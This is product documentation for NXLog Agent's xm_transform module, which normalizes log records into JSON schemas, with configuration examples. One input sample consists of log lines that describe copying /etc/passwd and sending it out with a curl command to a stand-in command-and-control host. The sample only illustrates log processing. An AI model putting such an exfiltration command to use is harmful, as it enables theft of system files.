Transform (xm_transform)

This module allows normalizing log data according to a specified schema. It accepts file-based schemas in JSON format and supports dynamically setting the schema file.

The module is intended to be used with the JSON (xm_json) extension.

To examine the supported platforms, see the list of installation packages.

Schema definition

You must define one or more event schemas in JSON format and save each schema in a separate file. The schema can include constant strings and event fields.

Basic event schema
{
  "agent_name": "NXLog Agent", (1)
  "message": "$raw_event" (2)
}
1 Sets the agent_name property to NXLog Agent for every log record.
2 Sets the message property to the value of the $raw_event core field.

The schema can also contain nested JSON objects. For example, the following schema includes a metadata property containing an object.

Schema with nested object
{
  "message": "$raw_event",
  "metadata": {
    "agent": {
      "name": "NXLog Agent",
      "ingestion": "$EventReceivedTime"
    }
  }
}

If a log record does not contain a field defined in the schema, that field’s value is set to null during processing. If you need to change the value of undefined fields, you can do so before calling the process() procedure as follows:

<Exec>
    if not defined($MyField) {
      $MyField = "undefined";
    }

    my_transform_instance->process();
</Exec>

See Log records and fields for more information on how NXLog Agent parses log records into fields.

Configuration

The xm_transform module accepts the following directives in addition to the common module directives.

Required directives

Schema

Specifies the path to a schema file. NXLog Agent formats log records using this schema when you process them with this extension. The module should include either the Schema or the SchemaMap directive, but not both. If both Schema and SchemaMap directives are present, the module uses the Schema value only.

SchemaMap

Specifies a map of names and the corresponding schema file location. You can use these names when dynamically setting the schema with the set_schema() procedure. See Setting the schema dynamically below for an example. The module should include either the SchemaMap or the Schema directive, but not both. If both Schema and SchemaMap directives are present, the module uses the Schema value only.

NXLog Agent drops events that do not match any schema. For example, if the defined schema is incorrect or does not exist. To prevent data loss, declare a default schema using the SchemaMap directive. NXLog Agent validates the schema and reports any schema parsing errors at startup.

Optional directive

SchemaDir

Specifies the path to a folder containing your schema files. NXLog Agent looks for the schema files specified by the Schema or SchemaMap directive in this folder. The default is the folder that contains the configuration file where the xm_transform instance is defined.

Procedures

The following procedures are exported by xm_transform.

process();

This procedure processes the log record and transforms it according to the module instance settings. You must call this procedure using the -> operator. See Calling a function of a specific module instance for more information.

set_schema(type: string schema_name);

Sets the schema file, overriding the default one. The schema_name must match a schema name defined by the SchemaMap directive. If the schema file is invalid the agent falls back to the default schema, if defined. You must call this procedure using the -> operator. See Calling a function of a specific module instance for more information.

Examples

Example 1. Transforming logs using a schema file

This configuration collects Linux system logs from a file and transforms log records according to a schema file.

nxlog.conf
<Extension transform>
    Module    xm_transform
    Schema    'schemas/default.json' (1)
</Extension>

<Extension json>
    Module    xm_json
</Extension>

<Input system_logs>
    Module    im_file
    File      '/var/log/syslog'
    <Exec>
        transform->process(); (2)
        to_json(); (3)
    </Exec>
</Input>
1 Defines the path of the schema file. The path is relative to the NXLog Agent configuration folder.
2 Normalizes log records according to the schema file defined in the Schema directive.
3 Calls the to_json() procedure of xm_json to convert the record to JSON format.

The following is a basic schema file compatible with log events collected by the im_file input module. This module populates the core fields only.

default.json
{
  "Event": "$raw_event",
  "Metadata": {
    "Type": "GENERIC",
    "IngestionTime": "$EventReceivedTime"
  }
}
Input sample
2024-09-26 16:05:47 [100]: File "/etc/passwd" 512 bytes was copied to "/tmp/steal.txt".
2024-09-26 16:05:47 [100]: Process 123 "/usr/bin/curl" with command line "-d @/tmp/steal.txt http://example-cc.bot".
2024-09-26 16:05:47 [100]: File "/tmp/steal" 512 bytes was deleted.
Output sample
{
  "Event": "2024-09-26 16:05:47 [100]: File \"/etc/passwd\" 512 bytes was copied to \"/tmp/steal.txt\".",
  "Metadata": {
    "Type": "GENERIC",
    "IngestionTime": "2024-09-26T16:06:00.984034+02:00"
  }
}
Example 2. Setting the schema dynamically

This configuration collects logs from three files and transforms log records according to the input module instance name:

Input module instance Schema file

system

syslog.json

auth

authentication.json

dpkg

default.json

nxlog.conf
<Extension transform>
    Module       xm_transform
    SchemaDir    'schemas/'  (1)

    <SchemaMap>  (2)
      system     syslog.json
      auth       authentication.json
      default    default.json (3)
    </SchemaMap>
</Extension>

<Extension json>
    Module       xm_json
</Extension>

<Extension syslog>
    Module       xm_syslog
</Extension>

<Input system>
    Module       im_file
    File         '/var/log/syslog'
    Exec         parse_syslog();
</Input>

<Input auth>
    Module       im_file
    File         '/var/log/auth.log'
    <Exec>
        parse_syslog();
        if $Message =~ /^pam_unix\((\S+):session\): session opened for user (\S+) by\ \(uid=(\d+)\)$/
        {
            $Process = $1
            $AccountName = $2;
            $AccountID = integer($3);
        }
    </Exec>
</Input>

<Input dpkg>
    Module       im_file
    File         '/var/log/dpkg.log'
</Input>

<Output file>
    Module       om_file
    File         '/tmp/nxlog'
    <Exec>
        transform->set_schema($SourceModuleName);
        transform->process(); (4)
        to_json(); (5)
    </Exec>
</Output>

<Route r1>
    Path         system, auth, dpkg => file
</Route>
1 Defines the path of the directory containing the schema files. The path is relative to the NXLog Agent configuration file.
2 Maps names to schema files. You use the names when dynamically setting the schema with set_schema().
3 The default schema is used when no other suitable schema is found.
4 Normalizes log records according to the SchemaMap.
5 Calls the to_json() procedure of xm_json to convert the record to JSON format.